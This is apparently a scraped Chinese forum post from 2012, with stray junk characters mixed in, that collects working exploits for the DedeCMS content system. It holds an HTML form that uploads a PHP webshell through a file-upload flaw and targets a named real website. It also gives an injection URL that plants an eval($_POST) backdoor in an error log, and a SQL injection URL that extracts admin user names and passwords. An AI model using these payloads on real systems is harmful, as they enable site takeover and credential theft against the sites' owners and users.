& ^/ H3 s9 Y4 j0 G<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>* I8 l; \, Z4 K! c3 f
</head>
* b2 I8 J& U m<body style="FONT-SIZE: 9pt">
: U, d; ~# `( L6 L- m, m---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />: |' I7 {& I& R, r, d' T Q
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>2 N. Y5 x8 b8 V3 b4 R
<input type='hidden' name='activepath' value='/data/cache/' />
) ]: m5 P' b0 h6 R. s: E) @<input type='hidden' name='cfg_basedir' value='../../' />
8 H/ A5 A E. m" f( N4 r; a1 ~. Z<input type='hidden' name='cfg_imgtype' value='php' />/ E8 b! L+ V8 @' w
<input type='hidden' name='cfg_not_allowall' value='txt' />
7 {+ X9 F$ }4 Z8 `( |<input type='hidden' name='cfg_softtype' value='php' />+ |5 |& [& I& d. L
<input type='hidden' name='cfg_mediatype' value='php' />
% T9 k. ]% v: A<input type='hidden' name='f' value='form1.enclosure' />
+ ^ }9 B' w7 Y<input type='hidden' name='job' value='upload' />
3 Q* b% j; W y8 U. g<input type='hidden' name='newname' value='fly.php' />
0 V i# _) B3 W& t' eSelect U Shell <input type='file' name='uploadfile' size='25' />
8 h5 t+ N5 g0 ^+ R- D4 M3 D9 Z<input type='submit' name='sb1' value='确定' />/ W; z) }4 Q2 R* J& P
</form>
. Y& ?) x2 j1 u) a<br />It's just a exp for the bug of Dedecms V55...<br />
2 I3 Q% ]) _' c3 G8 W) u; pNeed register_globals = on...<br />4 q! C; p1 f& m& e3 ]
Fun the game,get a webshell at /data/cache/fly.php...<br />
+ \. X+ G' x h& l/ e</body>) ^2 p* ]& N+ y% s
</html>9 C- a9 k. F. j$ i
$ r$ k- C! N4 f$ H5 R* C9 c+ O4 ?; {: B6 Y8 q- g8 T7 y, ~
; j4 d! v" x/ ~6 f
$ t9 a& m& }1 _' i7 v% H9 X- m* c. u9 _
+ E4 p& t. q# W# v: B& B, H
$ W+ m+ @* m/ y4 K0 v0 e+ ~6 j. V# M
) K% L: e. X7 g9 e( d4 Q" N) e& A8 Q
! E4 f. n. j8 E2 u4 q+ u6 X" B
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞! a& B. h& c* a1 z3 ~/ ~1 ]5 [
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
) l, f0 O# h1 r! ^8 A1. 访问网址:
: H* I* B' u6 d0 j6 thttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
. P5 C; j! z: a+ l, K& Y5 c* \* d5 m6 R可看见错误信息
" @* v! j8 ]( { T; c
/ k. [: x/ ~# g7 C" Y: E; { y4 J0 f8 m* G7 N
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。& i& v2 u9 f3 @4 i0 M
int(3) Error: Illegal double '1024e1024' value found during parsing
; d$ j5 { R, m6 a5 `( t; P$ qError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
9 w% [3 P5 R' L3 J) k5 W" p$ E, N3 J* ?+ N8 S( [% L
5 a+ x, ^! _8 M1 o. ], @3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是# ]1 K- _( f: y5 H
" R1 L0 K6 Z/ h* f, {- N' L0 i
{6 m' T! ^: j4 x& H# { j<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
4 b7 `, T' r) ^) D
, c7 W. b, b. B- s. m: S
9 ^( f6 r# T9 }" d# ?& x3 s按确定后的看到第2步骤的信息表示文件木马上传成功.
+ f- L# B' Q* C$ D6 I; H
8 s" u: H3 p+ W/ d2 p( o8 K. `' ?5 [) K
C8 ?. T0 N) k" y7 [$ }' ]
6 ? p8 P) ]/ J u* ]
" B( E, ^% c/ [" f% i
9 y4 Z' X v1 N
% A3 A* o. i3 F) @& @& {* Y3 N1 k# u$ i5 r2 H' H
3 }+ R. S2 S! p9 \: u/ O& C
1 X* O8 J- o- U$ I7 P
) u8 q4 q6 n3 t7 z5 P0 Z
% Q2 @; W8 L) _2 y2 ]+ H! p织梦(DedeCms)plus/infosearch.php 文件注入漏洞
8 H; s$ e0 H; Phttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对